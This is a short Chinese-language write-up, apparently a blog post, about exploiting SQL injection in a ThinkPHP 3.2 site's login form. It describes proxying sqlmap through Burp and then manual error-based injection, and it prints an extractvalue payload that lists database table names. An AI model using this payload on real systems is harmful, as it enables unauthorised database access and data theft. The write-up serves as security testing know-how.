#0x01 登录框存在sql注入:
通过前期的信息搜集,发现站点使用thinkphp3.2版本的框架,在登录页面验证存在sql注入:
成功读取到数据库版本:
#0x02 尝试通过手工注入获取后台账号
遗憾的是sqlmap连注入都识别不出:
–proxy=http://127.0.0.1:8080,将sqlmap的流量转发到burp分析payload,发现sqlmap发出的包多加了一个AND:
换手工注入:
- 查表名payload:extractvalue**(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)**